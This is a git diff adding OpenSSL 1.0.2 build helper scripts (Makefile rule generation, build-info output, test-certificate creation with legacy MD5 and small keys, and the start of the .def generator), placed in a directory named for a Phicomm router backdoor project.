+$rules.=&do_compile_rule("\$(OBJ_D)",$e_exe,'-DMONOLITH $(APP_CFLAGS)');
+
+# Special case rule for fips_premain_dso
+
+if ($fips)
+	{
+	$rules.=&cc_compile_target("\$(OBJ_D)${o}\$(E_PREMAIN_DSO)$obj",
+		"\$(FIPS_PREMAIN_SRC)",
+		"-DFINGERPRINT_PREMAIN_DSO_LOAD \$(APP_CFLAGS)", "");
+	$rules.=&do_link_rule("\$(PREMAIN_DSO_EXE)","\$(OBJ_D)${o}\$(E_PREMAIN_DSO)$obj \$(CRYPTOOBJ) \$(O_FIPSCANISTER)","","\$(EX_LIBS)", 1);
+	}
+
+sub fix_asm
+	{
+	my($asm, $dir) = @_;
+
+	return '' if $asm eq '';
+
+	$asm = " $asm";
+	$asm =~ s/\s+/ $dir\//g;
+	$asm =~ s/\.o//g;
+	$asm =~ s/^ //;
+
+	return $asm . ' ';
+	}
+
+if ($orig_platform eq 'copy') {
+	$lib_obj{CRYPTO} .= fix_asm($mf_md5_asm, 'crypto/md5');
+	$lib_obj{CRYPTO} .= fix_asm($mf_bn_asm, 'crypto/bn');
+	# cpuid is included by the crypto dir
+	#$lib_obj{CRYPTO} .= fix_asm($mf_cpuid_asm, 'crypto');
+	# AES asm files DON'T end up included by the aes dir itself
+	$lib_obj{CRYPTO} .= fix_asm($mf_aes_asm, 'crypto/aes');
+	$lib_obj{CRYPTO} .= fix_asm($mf_sha_asm, 'crypto/sha');
+	$lib_obj{CRYPTO} .= fix_asm($mf_engines_asm, 'engines');
+	$lib_obj{CRYPTO} .= fix_asm($mf_rc4_asm, 'crypto/rc4');
+	$lib_obj{CRYPTO} .= fix_asm($mf_modes_asm, 'crypto/modes');
+	$lib_obj{CRYPTO} .= fix_asm($mf_ec_asm, 'crypto/ec');
+}
+
+foreach (values %lib_nam)
+	{
+	$lib_obj=$lib_obj{$_};
+	local($slib)=$shlib;
+
+	$defs.=&do_defs(${_}."OBJ",$lib_obj,"\$(OBJ_D)",$obj);
+	$lib=($slib)?" \$(SHLIB_CFLAGS)".$shlib_ex_cflags{$_}:" \$(LIB_CFLAGS)";
+	$rules.=&do_compile_rule("\$(OBJ_D)",$lib_obj{$_},$lib);
+	}
+
+# hack to add version info on MSVC
+if (($platform eq "VC-WIN32") || ($platform eq "VC-WIN64A")
+	|| ($platform eq "VC-WIN64I") || ($platform eq "VC-NT")) {
+    $rules.= <<"EOF";
+\$(OBJ_D)\\\$(CRYPTO).res: ms\\version32.rc
+	\$(RSC) /fo"\$(OBJ_D)\\\$(CRYPTO).res" /d CRYPTO ms\\version32.rc
+
+\$(OBJ_D)\\\$(SSL).res: ms\\version32.rc
+	\$(RSC) /fo"\$(OBJ_D)\\\$(SSL).res" /d SSL ms\\version32.rc
+
+EOF
+}
+
+$defs.=&do_defs("T_EXE",$test,"\$(TEST_D)",$exep);
+foreach (split(/\s+/,$test))
+	{
+	$t=&bname($_);
+	$tt="\$(OBJ_D)${o}$t${obj}";
+	$rules.=&do_link_rule("\$(TEST_D)$o$t$exep",$tt,"\$(LIBS_DEP)","\$(L_LIBS) \$(EX_LIBS)");
+	}
+
+$defs.=&do_defs("E_SHLIB",$engines . $otherlibs,"\$(ENG_D)",$shlibp);
+
+foreach (split(/\s+/,$engines))
+	{
+	$rules.=&do_compile_rule("\$(OBJ_D)","engines${o}e_$_",$lib);
+	$rules.= &do_lib_rule("\$(OBJ_D)${o}e_${_}.obj","\$(ENG_D)$o$_$shlibp","",$shlib,"");
+	}
+
+
+
+$rules.= &do_lib_rule("\$(SSLOBJ)","\$(O_SSL)",$ssl,$shlib,"\$(SO_SSL)");
+
+if ($fips)
+	{
+	if ($shlib)
+		{
+		$rules.= &do_lib_rule("\$(CRYPTOOBJ) \$(O_FIPSCANISTER)",
+				"\$(O_CRYPTO)", "$crypto",
+				$shlib, "\$(SO_CRYPTO)", "\$(BASEADDR)");
+		}
+	else
+		{
+		$rules.= &do_lib_rule("\$(CRYPTOOBJ)",
+			"\$(O_CRYPTO)",$crypto,$shlib,"\$(SO_CRYPTO)", "");
+		$rules.= &do_lib_rule("\$(CRYPTOOBJ) \$(O_FIPSCANISTER)",
+			"\$(LIB_D)$o$crypto_compat",$crypto,$shlib,"\$(SO_CRYPTO)", "");
+		}
+	}
+	else
+	{
+	$rules.= &do_lib_rule("\$(CRYPTOOBJ)","\$(O_CRYPTO)",$crypto,$shlib,
+							"\$(SO_CRYPTO)");
+	}
+
+foreach (split(" ",$otherlibs))
+	{
+	my $uc = $_;
+	$uc =~ tr /a-z/A-Z/;	
+	$rules.= &do_lib_rule("\$(${uc}OBJ)","\$(ENG_D)$o$_$shlibp", "", $shlib, "");
+
+	}
+
+$rules.=&do_link_rule("\$(BIN_D)$o\$(E_EXE)$exep","\$(E_OBJ)","\$(LIBS_DEP)","\$(L_LIBS) \$(EX_LIBS)", ($fips && !$shlib) ? 2 : 0);
+
+$rules .= get_tests('test/Makefile') if $orig_platform eq 'copy';
+
+print $defs;
+
+if ($platform eq "linux-elf") {
+    print <<"EOF";
+# Generate perlasm output files
+%.cpp:
+	(cd \$(\@D)/..; PERL=perl make -f Makefile asm/\$(\@F))
+EOF
+}
+print "###################################################################\n";
+print $rules;
+
+###############################################
+# strip off any trailing .[och] and append the relative directory
+# also remembering to do nothing if we are in one of the dropped
+# directories
+sub var_add
+	{
+	local($dir,$val,$keepext)=@_;
+	local(@a,$_,$ret);
+
+	return("") if $no_engine && $dir =~ /\/engine/;
+	return("") if $no_hw   && $dir =~ /\/hw/;
+	return("") if $no_idea && $dir =~ /\/idea/;
+	return("") if $no_aes  && $dir =~ /\/aes/;
+	return("") if $no_camellia  && $dir =~ /\/camellia/;
+	return("") if $no_seed && $dir =~ /\/seed/;
+	return("") if $no_rc2  && $dir =~ /\/rc2/;
+	return("") if $no_rc4  && $dir =~ /\/rc4/;
+	return("") if $no_rc5  && $dir =~ /\/rc5/;
+	return("") if $no_rsa  && $dir =~ /\/rsa/;
+	return("") if $no_rsa  && $dir =~ /^rsaref/;
+	return("") if $no_dsa  && $dir =~ /\/dsa/;
+	return("") if $no_dh   && $dir =~ /\/dh/;
+	return("") if $no_ec   && $dir =~ /\/ec/;
+	return("") if $no_gost   && $dir =~ /\/ccgost/;
+	return("") if $no_cms  && $dir =~ /\/cms/;
+	return("") if $no_jpake  && $dir =~ /\/jpake/;
+	if ($no_des && $dir =~ /\/des/)
+		{
+		if ($val =~ /read_pwd/)
+			{ return("$dir/read_pwd "); }
+		else
+			{ return(""); }
+		}
+	return("") if $no_mdc2 && $dir =~ /\/mdc2/;
+	return("") if $no_sock && $dir =~ /\/proxy/;
+	return("") if $no_bf   && $dir =~ /\/bf/;
+	return("") if $no_cast && $dir =~ /\/cast/;
+	return("") if $no_whirlpool && $dir =~ /\/whrlpool/;
+
+	$val =~ s/^\s*(.*)\s*$/$1/;
+	@a=split(/\s+/,$val);
+	grep(s/\.[och]$//,@a) unless $keepext;
+
+	@a=grep(!/^e_.*_3d$/,@a) if $no_des;
+	@a=grep(!/^e_.*_d$/,@a) if $no_des;
+	@a=grep(!/^e_.*_ae$/,@a) if $no_idea;
+	@a=grep(!/^e_.*_i$/,@a) if $no_aes;
+	@a=grep(!/^e_.*_r2$/,@a) if $no_rc2;
+	@a=grep(!/^e_.*_r5$/,@a) if $no_rc5;
+	@a=grep(!/^e_.*_bf$/,@a) if $no_bf;
+	@a=grep(!/^e_.*_c$/,@a) if $no_cast;
+	@a=grep(!/^e_rc4$/,@a) if $no_rc4;
+	@a=grep(!/^e_camellia$/,@a) if $no_camellia;
+	@a=grep(!/^e_seed$/,@a) if $no_seed;
+
+	#@a=grep(!/(^s2_)|(^s23_)/,@a) if $no_ssl2;
+	#@a=grep(!/(^s3_)|(^s23_)/,@a) if $no_ssl3;
+
+	@a=grep(!/(_sock$)|(_acpt$)|(_conn$)|(^pxy_)/,@a) if $no_sock;
+
+	@a=grep(!/(^md2)|(_md2$)/,@a) if $no_md2;
+	@a=grep(!/(^md4)|(_md4$)/,@a) if $no_md4;
+	@a=grep(!/(^md5)|(_md5$)/,@a) if $no_md5;
+	@a=grep(!/(rmd)|(ripemd)/,@a) if $no_ripemd;
+
+	@a=grep(!/(^d2i_r_)|(^i2d_r_)/,@a) if $no_rsa;
+	@a=grep(!/(^p_open$)|(^p_seal$)/,@a) if $no_rsa;
+	@a=grep(!/(^pem_seal$)/,@a) if $no_rsa;
+
+	@a=grep(!/(m_dss$)|(m_dss1$)/,@a) if $no_dsa;
+	@a=grep(!/(^d2i_s_)|(^i2d_s_)|(_dsap$)/,@a) if $no_dsa;
+
+	@a=grep(!/^n_pkey$/,@a) if $no_rsa || $no_rc4;
+
+	@a=grep(!/_dhp$/,@a) if $no_dh;
+
+	@a=grep(!/(^sha[^1])|(_sha$)|(m_dss$)/,@a) if $no_sha;
+	@a=grep(!/(^sha1)|(_sha1$)|(m_dss1$)/,@a) if $no_sha1;
+	@a=grep(!/_mdc2$/,@a) if $no_mdc2;
+
+	@a=grep(!/(srp)/,@a) if $no_srp;
+
+	@a=grep(!/^engine$/,@a) if $no_engine;
+	@a=grep(!/^hw$/,@a) if $no_hw;
+	@a=grep(!/(^rsa$)|(^genrsa$)/,@a) if $no_rsa;
+	@a=grep(!/(^dsa$)|(^gendsa$)|(^dsaparam$)/,@a) if $no_dsa;
+	@a=grep(!/^gendsa$/,@a) if $no_sha1;
+	@a=grep(!/(^dh$)|(^gendh$)/,@a) if $no_dh;
+
+	@a=grep(!/(^dh)|(_sha1$)|(m_dss1$)/,@a) if $no_sha1;
+
+	grep($_="$dir/$_",@a);
+	@a=grep(!/(^|\/)s_/,@a) if $no_sock;
+	@a=grep(!/(^|\/)bio_sock/,@a) if $no_sock;
+	$ret=join(' ',@a)." ";
+	return($ret);
+	}
+
+# change things so that each 'token' is only separated by one space
+sub clean_up_ws
+	{
+	local($w)=@_;
+
+	$w =~ s/^\s*(.*)\s*$/$1/;
+	$w =~ s/\s+/ /g;
+	return($w);
+	}
+
+sub do_defs
+	{
+	local($var,$files,$location,$postfix)=@_;
+	local($_,$ret,$pf);
+	local(*OUT,$tmp,$t);
+
+	$files =~ s/\//$o/g if $o ne '/';
+	$ret="$var="; 
+	$n=1;
+	$Vars{$var}.="";
+	foreach (split(/ /,$files))
+		{
+		$orig=$_;
+		$_=&bname($_) unless /^\$/;
+		if ($n++ == 2)
+			{
+			$n=0;
+			$ret.="\\\n\t";
+			}
+		if (($_ =~ /bss_file/) && ($postfix eq ".h"))
+			{ $pf=".c"; }
+		else	{ $pf=$postfix; }
+		if ($_ =~ /BN_ASM/)	{ $t="$_ "; }
+		elsif ($_ =~ /BNCO_ASM/){ $t="$_ "; }
+		elsif ($_ =~ /AES_ASM/){ $t="$_ "; }
+		elsif ($_ =~ /DES_ENC/)	{ $t="$_ "; }
+		elsif ($_ =~ /BF_ENC/)	{ $t="$_ "; }
+		elsif ($_ =~ /CAST_ENC/){ $t="$_ "; }
+		elsif ($_ =~ /RC4_ENC/)	{ $t="$_ "; }
+		elsif ($_ =~ /RC5_ENC/)	{ $t="$_ "; }
+		elsif ($_ =~ /MD5_ASM/)	{ $t="$_ "; }
+		elsif ($_ =~ /SHA1_ASM/){ $t="$_ "; }
+		elsif ($_ =~ /RMD160_ASM/){ $t="$_ "; }
+		elsif ($_ =~ /WHIRLPOOL_ASM/){ $t="$_ "; }
+		elsif ($_ =~ /CPUID_ASM/){ $t="$_ "; }
+		else	{ $t="$location${o}$_$pf "; }
+
+		$Vars{$var}.="$t ";
+		$ret.=$t;
+		}
+	# hack to add version info on MSVC
+	if ($shlib && (($platform eq "VC-WIN32") || ($platfrom eq "VC-WIN64I") || ($platform eq "VC-WIN64A") || ($platform eq "VC-NT")))
+		{
+		if ($var eq "CRYPTOOBJ")
+			{ $ret.="\$(OBJ_D)\\\$(CRYPTO).res "; }
+		elsif ($var eq "SSLOBJ")
+			{ $ret.="\$(OBJ_D)\\\$(SSL).res "; }
+		}
+	chomp($ret);
+	$ret.="\n\n";
+	return($ret);
+	}
+
+# return the name with the leading path removed
+sub bname
+	{
+	local($ret)=@_;
+	$ret =~ s/^.*[\\\/]([^\\\/]+)$/$1/;
+	return($ret);
+	}
+
+# return the leading path
+sub dname
+	{
+	my $ret=shift;
+	$ret =~ s/(^.*)[\\\/][^\\\/]+$/$1/;
+	return($ret);
+	}
+
+##############################################################
+# do a rule for each file that says 'compile' to new direcory
+# compile the files in '$files' into $to
+sub do_compile_rule
+	{
+	local($to,$files,$ex)=@_;
+	local($ret,$_,$n,$d,$s);
+
+	$files =~ s/\//$o/g if $o ne '/';
+	foreach (split(/\s+/,$files))
+		{
+		$n=&bname($_);
+		$d=&dname($_);
+		if (-f "${_}.c")
+			{
+			$ret.=&cc_compile_target("$to${o}$n$obj","${_}.c",$ex)
+			}
+		elsif (-f ($s="${d}${o}asm${o}${n}.pl") or
+		       ($s=~s/sha256/sha512/ and -f $s) or
+		       -f ($s="${d}${o}${n}.pl"))
+			{
+			$ret.=&perlasm_compile_target("$to${o}$n$obj",$s,$n);
+			}
+		elsif (-f ($s="${d}${o}asm${o}${n}.S") or
+		       -f ($s="${d}${o}${n}.S"))
+			{
+			$ret.=&Sasm_compile_target("$to${o}$n$obj",$s,$n);
+			}
+		elsif (defined &special_compile_target and
+		       ($s=special_compile_target($_)))
+			{
+			$ret.=$s;
+			}
+		else	{ die "no rule for $_"; }
+		}
+	return($ret);
+	}
+
+##############################################################
+# do a rule for each file that says 'compile' to new direcory
+sub perlasm_compile_target
+	{
+	my($target,$source,$bname)=@_;
+
+	return platform_perlasm_compile_target($target, $source, $bname)
+	    if defined &platform_perlasm_compile_target;
+
+	my($ret);
+
+	$bname =~ s/(.*)\.[^\.]$/$1/;
+	$ret ="\$(TMP_D)$o$bname.asm: $source\n";
+	$ret.="\t\$(PERL) $source $asmtype \$(CFLAG) >\$\@\n\n";
+	$ret.="$target: \$(TMP_D)$o$bname.asm\n";
+	$ret.="\t\$(ASM) $afile\$\@ \$(TMP_D)$o$bname.asm\n\n";
+	return($ret);
+	}
+
+sub Sasm_compile_target
+	{
+	my($target,$source,$bname)=@_;
+	my($ret);
+
+	$bname =~ s/(.*)\.[^\.]$/$1/;
+	$ret ="\$(TMP_D)$o$bname.asm: $source\n";
+	$ret.="\t\$(CC) -E \$(CFLAG) $source >\$\@\n\n";
+	$ret.="$target: \$(TMP_D)$o$bname.asm\n";
+	$ret.="\t\$(ASM) $afile\$\@ \$(TMP_D)$o$bname.asm\n\n";
+	return($ret);
+	}
+
+sub cc_compile_target
+	{
+	local($target,$source,$ex_flags, $srcd)=@_;
+	local($ret);
+	
+	$ex_flags.=" -DMK1MF_BUILD -D$platform_cpp_symbol" if ($source =~ /cversion/);
+	$target =~ s/\//$o/g if $o ne "/";
+	$source =~ s/\//$o/g if $o ne "/";
+	$srcd = "\$(SRC_D)$o" unless defined $srcd && $platform ne 'copy';
+	$ret ="$target: $srcd$source\n\t";
+	$ret.="\$(CC)";
+	$ret.= " -MMD" if $orig_platform eq "copy";
+	$ret.= " ${ofile}$target $ex_flags -c $srcd$source\n\n";
+	$target =~ s/\.o$/.d/;
+	$ret.=".sinclude \"$target\"\n\n" if $orig_platform eq "copy";
+	return($ret);
+	}
+
+##############################################################
+sub do_asm_rule
+	{
+	local($target,$src)=@_;
+	local($ret,@s,@t,$i);
+
+	$target =~ s/\//$o/g if $o ne "/";
+	$src =~ s/\//$o/g if $o ne "/";
+
+	@t=split(/\s+/,$target);
+	@s=split(/\s+/,$src);
+
+
+	for ($i=0; $i<=$#s; $i++)
+		{
+		my $objfile = $t[$i];
+		my $srcfile = $s[$i];
+
+		if ($perl_asm == 1)
+			{
+			my $plasm = $objfile;
+			$plasm =~ s/${obj}/.pl/;
+			$ret.="$srcfile: $plasm\n";
+			$ret.="\t\$(PERL) $plasm $asmtype \$(CFLAG) >$srcfile\n\n";
+			}
+
+		$ret.="$objfile: $srcfile\n";
+		$ret.="\t\$(ASM) $afile$objfile \$(SRC_D)$o$srcfile\n\n";
+		}
+	return($ret);
+	}
+
+sub do_shlib_rule
+	{
+	local($n,$def)=@_;
+	local($ret,$nn);
+	local($t);
+
+	($nn=$n) =~ tr/a-z/A-Z/;
+	$ret.="$n.dll: \$(${nn}OBJ)\n";
+	if ($vc && $w32)
+		{
+		$ret.="\t\$(MKSHLIB) $efile$n.dll $def @<<\n  \$(${nn}OBJ_F)\n<<\n";
+		}
+	$ret.="\n";
+	return($ret);
+	}
+
+# do a rule for each file that says 'copy' to new direcory on change
+sub do_copy_rule
+	{
+	local($to,$files,$p)=@_;
+	local($ret,$_,$n,$pp);
+	
+	$files =~ s/\//$o/g if $o ne '/';
+	foreach (split(/\s+/,$files))
+		{
+		$n=&bname($_);
+		if ($n =~ /bss_file/)
+			{ $pp=".c"; }
+		else	{ $pp=$p; }
+		$ret.="$to${o}$n$pp: \$(SRC_D)$o$_$pp\n\t\$(PERL) \$(SRC_D)${o}util${o}copy-if-different.pl \"\$(SRC_D)$o$_$pp\" \"$to${o}$n$pp\"\n\n";
+		}
+	return($ret);
+	}
+
+# Options picked up from the OPTIONS line in the top level Makefile
+# generated by Configure.
+
+sub read_options
+	{
+	# Many options are handled in a similar way. In particular
+	# no-xxx sets zero or more scalars to 1.
+	# Process these using the %valid_options hash containing the option
+	# name and reference to the scalars to set. In some cases the option
+	# needs no special handling and can be ignored: this is done by
+	# setting the value to 0.
+
+	my %valid_options = (
+		"no-rc2" => \$no_rc2,
+		"no-rc4" => \$no_rc4,
+		"no-rc5" => \$no_rc5,
+		"no-idea" => \$no_idea,
+		"no-aes" => \$no_aes,
+		"no-camellia" => \$no_camellia,
+		"no-seed" => \$no_seed,
+		"no-des" => \$no_des,
+		"no-bf" => \$no_bf,
+		"no-cast" => \$no_cast,
+		"no-md2" => \$no_md2,
+		"no-md4" => \$no_md4,
+		"no-md5" => \$no_md5,
+		"no-sha" => \$no_sha,
+		"no-sha1" => \$no_sha1,
+		"no-ripemd" => \$no_ripemd,
+		"no-mdc2" => \$no_mdc2,
+		"no-whirlpool" => \$no_whirlpool,
+		"no-patents" => 
+			[\$no_rc2, \$no_rc4, \$no_rc5, \$no_idea, \$no_rsa],
+		"no-rsa" => \$no_rsa,
+		"no-dsa" => \$no_dsa,
+		"no-dh" => \$no_dh,
+		"no-hmac" => \$no_hmac,
+		"no-asm" => \$no_asm,
+		"nasm" => \$nasm,
+		"nw-nasm" => \$nw_nasm,
+		"nw-mwasm" => \$nw_mwasm,
+		"gaswin" => \$gaswin,
+		"no-ssl2" => \$no_ssl2,
+		"no-ssl3" => \$no_ssl3,
+		"no-ssl3-method" => 0,
+		"no-tlsext" => \$no_tlsext,
+		"no-srp" => \$no_srp,
+		"no-cms" => \$no_cms,
+		"no-jpake" => \$no_jpake,
+		"no-ec2m" => \$no_ec2m,
+		"no-ec_nistp_64_gcc_128" => 0,
+		"no-err" => \$no_err,
+		"no-sock" => \$no_sock,
+		"no-krb5" => \$no_krb5,
+		"no-ec" => \$no_ec,
+		"no-ecdsa" => \$no_ecdsa,
+		"no-ecdh" => \$no_ecdh,
+		"no-gost" => \$no_gost,
+		"no-engine" => \$no_engine,
+		"no-hw" => \$no_hw,
+		"no-rsax" => 0,
+		"just-ssl" =>
+			[\$no_rc2, \$no_idea, \$no_des, \$no_bf, \$no_cast,
+			  \$no_md2, \$no_sha, \$no_mdc2, \$no_dsa, \$no_dh,
+			  \$no_ssl2, \$no_err, \$no_ripemd, \$no_rc5,
+			  \$no_aes, \$no_camellia, \$no_seed, \$no_srp],
+		"rsaref" => 0,
+		"gcc" => \$gcc,
+		"debug" => \$debug,
+		"profile" => \$profile,
+		"shlib" => \$shlib,
+		"dll" => \$shlib,
+		"shared" => 0,
+		"no-sctp" => 0,
+		"no-srtp" => 0,
+		"no-gmp" => 0,
+		"no-rfc3779" => 0,
+		"no-montasm" => 0,
+		"no-shared" => 0,
+		"no-store" => 0,
+		"no-zlib" => 0,
+		"no-zlib-dynamic" => 0,
+		"no-ssl-trace" => 0,
+		"no-unit-test" => 0,
+		"no-libunbound" => 0,
+		"no-multiblock" => 0,
+		"fips" => \$fips
+		);
+
+	if (exists $valid_options{$_})
+		{
+		my $r = $valid_options{$_};
+		if ( ref $r eq "SCALAR")
+			{ $$r = 1;}
+		elsif ( ref $r eq "ARRAY")
+			{
+			my $r2;
+			foreach $r2 (@$r)
+				{
+				$$r2 = 1;
+				}
+			}
+		}
+	elsif (/^no-comp$/) { $xcflags = "-DOPENSSL_NO_COMP $xcflags"; }
+	elsif (/^enable-zlib$/) { $zlib_opt = 1 if $zlib_opt == 0 }
+	elsif (/^enable-zlib-dynamic$/)
+		{
+		$zlib_opt = 2;
+		}
+	elsif (/^no-static-engine/)
+		{
+		$no_static_engine = 1;
+		}
+	elsif (/^enable-static-engine/)
+		{
+		$no_static_engine = 0;
+		}
+	# There are also enable-xxx options which correspond to
+	# the no-xxx. Since the scalars are enabled by default
+	# these can be ignored.
+	elsif (/^enable-/)
+		{
+		my $t = $_;
+		$t =~ s/^enable/no/;
+		if (exists $valid_options{$t})
+			{return 1;}
+		return 0;
+		}
+	# experimental-xxx is mostly like enable-xxx, but opensslconf.v
+	# will still set OPENSSL_NO_xxx unless we set OPENSSL_EXPERIMENTAL_xxx.
+	# (No need to fail if we don't know the algorithm -- this is for adventurous users only.)
+	elsif (/^experimental-/)
+		{
+		my $algo, $ALGO;
+		($algo = $_) =~ s/^experimental-//;
+		($ALGO = $algo) =~ tr/[a-z]/[A-Z]/;
+
+		$xcflags="-DOPENSSL_EXPERIMENTAL_$ALGO $xcflags";
+		
+		}
+	elsif (/^--with-krb5-flavor=(.*)$/)
+		{
+		my $krb5_flavor = $1;
+		if ($krb5_flavor =~ /^force-[Hh]eimdal$/)
+			{
+			$xcflags="-DKRB5_HEIMDAL $xcflags";
+			}
+		elsif ($krb5_flavor =~ /^MIT/i)
+			{
+			$xcflags="-DKRB5_MIT $xcflags";
+		 	if ($krb5_flavor =~ /^MIT[._-]*1[._-]*[01]/i)
+				{
+				$xcflags="-DKRB5_MIT_OLD11 $xcflags"
+				}
+			}
+		}
+	elsif (/^([^=]*)=(.*)$/){ $VARS{$1}=$2; }
+	elsif (/^-[lL].*$/)	{ $l_flags.="$_ "; }
+	elsif ((!/^-help/) && (!/^-h/) && (!/^-\?/) && /^-.*$/)
+		{ $c_flags.="$_ "; }
+	else { return(0); }
+	return(1);
+	}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/util/mkbuildinf.pl b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/util/mkbuildinf.pl
new file mode 100755
index 0000000..ffa8a39
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/util/mkbuildinf.pl
@@ -0,0 +1,35 @@
+#!/usr/local/bin/perl
+
+my ($cflags, $platform) = @ARGV;
+
+$cflags = "compiler: $cflags";
+$date = localtime();
+print <<"END_OUTPUT";
+#ifndef MK1MF_BUILD
+    /* auto-generated by util/mkbuildinf.pl for crypto/cversion.c */
+    #define CFLAGS cflags
+    /*
+     * Generate CFLAGS as an array of individual characters. This is a
+     * workaround for the situation where CFLAGS gets too long for a C90 string
+     * literal
+     */
+    static const char cflags[] = {
+END_OUTPUT
+my $ctr = 0;
+foreach my $c (split //, $cflags) {
+    # Max 18 characters per line
+    if  (($ctr++ % 18) == 0) {
+        if ($ctr != 1) {
+            print "\n";
+        }
+        print "        ";
+    }
+    print "'$c',";
+}
+print <<"END_OUTPUT";
+'\\0'
+    };
+    #define PLATFORM "platform: $platform"
+    #define DATE "built on: $date"
+#endif
+END_OUTPUT
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/util/mkcerts.sh b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/util/mkcerts.sh
new file mode 100755
index 0000000..0184fcb
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/util/mkcerts.sh
@@ -0,0 +1,220 @@
+#!/bin/sh
+
+# This script will re-make all the required certs.
+# cd apps
+# sh ../util/mkcerts.sh
+# mv ca-cert.pem pca-cert.pem ../certs
+# cd ..
+# cat certs/*.pem >>apps/server.pem
+# cat certs/*.pem >>apps/server2.pem
+# SSLEAY=`pwd`/apps/ssleay; export SSLEAY
+# sh tools/c_rehash certs
+#
+ 
+CAbits=1024
+SSLEAY="../apps/openssl"
+CONF="-config ../apps/openssl.cnf"
+
+# create pca request.
+echo creating $CAbits bit PCA cert request
+$SSLEAY req $CONF \
+	-new -md5 -newkey $CAbits \
+	-keyout pca-key.pem \
+	-out pca-req.pem -nodes >/dev/null <<EOF
+AU
+Queensland
+.
+CryptSoft Pty Ltd
+.
+Test PCA (1024 bit)
+
+
+
+EOF
+
+if [ $? != 0 ]; then
+	echo problems generating PCA request
+	exit 1
+fi
+
+#sign it.
+echo
+echo self signing PCA
+$SSLEAY x509 -md5 -days 1461 \
+	-req -signkey pca-key.pem \
+	-CAcreateserial -CAserial pca-cert.srl \
+	-in pca-req.pem -out pca-cert.pem
+
+if [ $? != 0 ]; then
+	echo problems self signing PCA cert
+	exit 1
+fi
+echo
+
+# create ca request.
+echo creating $CAbits bit CA cert request
+$SSLEAY req $CONF \
+	-new -md5 -newkey $CAbits \
+	-keyout ca-key.pem \
+	-out ca-req.pem -nodes >/dev/null <<EOF
+AU
+Queensland
+.
+CryptSoft Pty Ltd
+.
+Test CA (1024 bit)
+
+
+
+EOF
+
+if [ $? != 0 ]; then
+	echo problems generating CA request
+	exit 1
+fi
+
+#sign it.
+echo
+echo signing CA
+$SSLEAY x509 -md5 -days 1461 \
+	-req \
+	-CAcreateserial -CAserial pca-cert.srl \
+	-CA pca-cert.pem -CAkey pca-key.pem \
+	-in ca-req.pem -out ca-cert.pem
+
+if [ $? != 0 ]; then
+	echo problems signing CA cert
+	exit 1
+fi
+echo
+
+# create server request.
+echo creating 512 bit server cert request
+$SSLEAY req $CONF \
+	-new -md5 -newkey 512 \
+	-keyout s512-key.pem \
+	-out s512-req.pem -nodes >/dev/null <<EOF
+AU
+Queensland
+.
+CryptSoft Pty Ltd
+.
+Server test cert (512 bit)
+
+
+
+EOF
+
+if [ $? != 0 ]; then
+	echo problems generating 512 bit server cert request
+	exit 1
+fi
+
+#sign it.
+echo
+echo signing 512 bit server cert
+$SSLEAY x509 -md5 -days 365 \
+	-req \
+	-CAcreateserial -CAserial ca-cert.srl \
+	-CA ca-cert.pem -CAkey ca-key.pem \
+	-in s512-req.pem -out server.pem
+
+if [ $? != 0 ]; then
+	echo problems signing 512 bit server cert
+	exit 1
+fi
+echo
+
+# create 1024 bit server request.
+echo creating 1024 bit server cert request
+$SSLEAY req $CONF \
+	-new -md5 -newkey 1024 \
+	-keyout s1024key.pem \
+	-out s1024req.pem -nodes >/dev/null <<EOF
+AU
+Queensland
+.
+CryptSoft Pty Ltd
+.
+Server test cert (1024 bit)
+
+
+
+EOF
+
+if [ $? != 0 ]; then
+	echo problems generating 1024 bit server cert request
+	exit 1
+fi
+
+#sign it.
+echo
+echo signing 1024 bit server cert
+$SSLEAY x509 -md5 -days 365 \
+	-req \
+	-CAcreateserial -CAserial ca-cert.srl \
+	-CA ca-cert.pem -CAkey ca-key.pem \
+	-in s1024req.pem -out server2.pem
+
+if [ $? != 0 ]; then
+	echo problems signing 1024 bit server cert
+	exit 1
+fi
+echo
+
+# create 512 bit client request.
+echo creating 512 bit client cert request
+$SSLEAY req $CONF \
+	-new -md5 -newkey 512 \
+	-keyout c512-key.pem \
+	-out c512-req.pem -nodes >/dev/null <<EOF
+AU
+Queensland
+.
+CryptSoft Pty Ltd
+.
+Client test cert (512 bit)
+
+
+
+EOF
+
+if [ $? != 0 ]; then
+	echo problems generating 512 bit client cert request
+	exit 1
+fi
+
+#sign it.
+echo
+echo signing 512 bit client cert
+$SSLEAY x509 -md5 -days 365 \
+	-req \
+	-CAcreateserial -CAserial ca-cert.srl \
+	-CA ca-cert.pem -CAkey ca-key.pem \
+	-in c512-req.pem -out client.pem
+
+if [ $? != 0 ]; then
+	echo problems signing 512 bit client cert
+	exit 1
+fi
+
+echo cleanup
+
+cat pca-key.pem  >> pca-cert.pem
+cat ca-key.pem   >> ca-cert.pem
+cat s512-key.pem >> server.pem
+cat s1024key.pem >> server2.pem
+cat c512-key.pem >> client.pem
+
+for i in pca-cert.pem ca-cert.pem server.pem server2.pem client.pem
+do
+$SSLEAY x509 -issuer -subject -in $i -noout >$$
+cat $$
+/bin/cat $i >>$$
+/bin/mv $$ $i
+done
+
+#/bin/rm -f *key.pem *req.pem *.srl
+
+echo Finished
+
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/util/mkdef.pl b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/util/mkdef.pl
new file mode 100755
index 0000000..c57c7f7
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/util/mkdef.pl
@@ -0,0 +1,1557 @@
+#!/usr/local/bin/perl -w
+#
+# generate a .def file
+#
+# It does this by parsing the header files and looking for the
+# prototyped functions: it then prunes the output.
+#
+# Intermediary files are created, call libeay.num and ssleay.num,...
+# Previously, they had the following format:
+#
+#	routine-name	nnnn
+#
+# But that isn't enough for a number of reasons, the first on being that
+# this format is (needlessly) very Win32-centric, and even then...
+# One of the biggest problems is that there's no information about what
+# routines should actually be used, which varies with what crypto algorithms
+# are disabled.  Also, some operating systems (for example VMS with VAX C)
+# need to keep track of the global variables as well as the functions.
+#
+# So, a remake of this script is done so as to include information on the
+# kind of symbol it is (function or variable) and what algorithms they're
